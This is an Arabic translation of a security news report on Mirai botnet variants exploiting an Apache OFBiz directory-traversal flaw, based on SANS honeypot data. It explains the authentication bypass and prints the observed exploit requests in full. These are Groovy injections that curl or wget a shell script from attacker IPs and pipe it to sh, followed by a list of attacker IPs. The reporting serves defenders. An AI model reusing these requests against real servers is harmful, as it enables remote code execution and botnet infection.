تستهدف Mirai Botnet خوادم OFBiz المعرضة لخطر اجتياز الدليل

02 أغسطس 2024أخبار الهاكرالضعف / أمن الشبكات

يعد برنامج تخطيط موارد المؤسسات (ERP) هو قلب العديد من المشاريع الداعمة للموارد البشرية والمحاسبة والشحن والتصنيع. يمكن أن تصبح هذه الأنظمة معقدة للغاية ويصعب صيانتها. غالبًا ما تكون مخصصة للغاية، مما قد يجعل عملية الترقيع صعبة. ومع ذلك، تستمر نقاط الضعف الحرجة في التأثير على هذه الأنظمة وتعرض بيانات الأعمال المهمة للخطر.

مركز عاصفة الإنترنت SANS نشرت تقريرا يوضح كيف أصبح إطار عمل تخطيط موارد المؤسسات (ERP) مفتوح المصدر OFBiz حاليًا هدفًا لأنواع جديدة من شبكة الروبوتات Mirai.

كجزء من محفظة مشاريعها الواسعة، تدعم مؤسسة Apache OFBiz، إطار عمل يستند إلى Java لإنشاء تطبيقات ERP (تخطيط موارد المؤسسات). يبدو أن OFBiz أقل انتشارا بكثير من البدائل التجارية. ومع ذلك، كما هو الحال مع أي نظام تخطيط موارد المؤسسات (ERP) آخر، تعتمد المؤسسات عليه للحصول على بيانات الأعمال الحساسة، ويعد أمان أنظمة تخطيط موارد المؤسسات (ERP) أمرًا بالغ الأهمية.

في مايو من هذا العام، أ تحديث أمني حاسم تم إصداره لـ OFBiz. قام التحديث بإصلاح ثغرة أمنية في اجتياز الدليل والتي قد تؤدي إلى تنفيذ الأمر عن بعد. تأثرت إصدارات OFBiz قبل 18.12.13. بعد بضعة أسابيع، تفاصيل حول الثغرة الأمنية تم الإعلان عنها.

يمكن استخدام نقاط الضعف في اجتياز الدليل، أو اجتياز المسار، لتجاوز قواعد التحكم في الوصول. على سبيل المثال، إذا كان بإمكان المستخدم الوصول إلى دليل “/public” وليس إلى دليل “/admin”، فقد يستخدم المهاجم عنوان URL مثل “/public/../admin” لخداع منطق التحكم في الوصول. في الآونة الأخيرة، CISA ومكتب التحقيقات الفدرالي أصدرت تنبيها كجزء من مبادرة “التصميم الآمن”، مع التركيز على اجتياز الدليل. أشارت CISA إلى أنها تقوم حاليًا بتتبع 55 ثغرة أمنية في اجتياز الدليل كجزء من كتالوج “الثغرات المستغلة المعروفة” (KEV).

بالنسبة لـ OFBiz، يتم تشغيل اجتياز الدليل بسهولة عن طريق إدراج فاصلة منقوطة. كل ما يجب على المهاجم العثور عليه هو عنوان URL الذي يمكنه الوصول إليه وإلحاقه بفاصلة منقوطة متبوعة بعنوان URL مقيد. عنوان URL للاستغلال الذي نراه حاليًا هو:

/webtools/control/forgotPassword;/ProgramExport

نظرًا لأنه يجب أن يكون المستخدمون قادرين على إعادة تعيين كلمات المرور دون تسجيل الدخول أولاً، فإن “forgotPassword” لا يتطلب أي مصادقة. من ناحية أخرى، يجب أن يكون “ProgramExport” خاضعًا للتحكم في الوصول ولا يمكن الوصول إليه إلا إذا قام المستخدم بتسجيل الدخول. يعد “ProgramExport” خطيرًا بشكل خاص لأنه يسمح بتنفيذ تعليمات برمجية عشوائية. توقف المنطق الخاطئ في OFBiz عن تقييم عنوان URL عند الفاصلة المنقوطة. سمح هذا لأي مستخدم، دون تسجيل الدخول، بالوصول إلى الجزء الثاني من عنوان URL، “/ProgramExport.”

يجب على المهاجم استخدام طلب POST لاستغلال الثغرة الأمنية ولكنه لا يحتاج بالضرورة إلى نص الطلب. وبدلاً من ذلك، ستعمل معلمة URL بشكل جيد.

ال مركز SANS لعاصفة الإنترنت يستخدم شبكة واسعة من مصائد الجذب لاكتشاف محاولات استغلال مجموعة واسعة من نقاط الضعف في تطبيقات الويب. تم تلخيص محاولات الاستغلال الجديدة الهامة في “الروية الأولى” تقرير. في نهاية هذا الأسبوع، اكتشفت هذه المستشعرات زيادة كبيرة في محاولات استغلال CVE-2024-32213، وهي ثغرة أمنية اجتياز الدليل المذكورة أعلاه من OFBiz، والتي تم اكتشافها على الفور من خلال تقرير “First Seen”.

نشأت محاولات الاستغلال من عنواني IP مختلفين ارتبطا أيضًا بمحاولات مختلفة لاستغلال أجهزة إنترنت الأشياء، والتي ترتبط عادةً بالأنواع الحالية من شبكة الروبوتات “Mirai”.

استخدم الأوغاد نكهتين من الاستغلال. استخدم الأول عنوان URL ليشمل الأمر الذي كان الهدف من استغلاله تنفيذه:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh

أما الثاني فقد استخدم نص طلب الأمر، وهو أكثر شيوعًا لطلبات “POST”:

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);

للأسف، لم يتم استرداد البرنامج النصي “bin.sh” أو “sh”. تمت مشاركة عناوين IP في عمليات الفحص يوم 29 يوليو، باستخدام وكيل المستخدم “KrebsOnSecurity”، وهي نصيحة لمدون أمن المعلومات Brian Krebs. ومع ذلك، كانت عناوين URL التي تم فحصها طفيلية في الغالب، حيث كانت تبحث عن صدفات الويب الموجودة التي خلفتها الهجمات السابقة. تم استخدام عنوان IP أيضًا لتوزيع ملف يسمى “botx.arm”. غالبًا ما يرتبط اسم الملف هذا بمتغيرات Mirai.

مع الإعلان عن الثغرة الأمنية في شهر مايو، كنا ننتظر بعض عمليات الفحص للاستفادة من ثغرة OFBiz. كان الاستغلال تافهًا، وعلى الرغم من أن عدد السكان المعرضين للخطر والمعرضين صغير، إلا أن هذا لم يمنع المهاجمين في الماضي. لكنهم الآن على الأقل يقومون بالتجربة وربما يضيفون الثغرة الأمنية إلى الروبوتات مثل متغيرات Mirai.

لا يوجد سوى عدد قليل من عناوين IP المعنية:

• 95.214.27.196: إرسال استغلال كمعلمة URL واستضافة البرامج الضارة.
• 83.222.191.62: إرسال استغلال كنص الطلب. البرامج الضارة المستضافة على 185.196.10.231. في وقت سابق من شهر يوليو، تم فحص عنوان IP هذا بحثًا عن ثغرات إنترنت الأشياء.
• 185.196.10.231: استضافة البرامج الضارة

إذا وجدت هذه المقالة مثيرة للاهتمام وترغب في التعمق أكثر في عالم تأمين تطبيقات الويب وواجهات برمجة التطبيقات والخدمات الصغيرة، فيمكنك الانضمام إلي في Network Security 2024 (من 4 إلى 9 سبتمبر) الدورة التدريبية الخاصة بي، SEC522. شاهد كل ما هو موجود في المتجر في هذا الحدث هنا.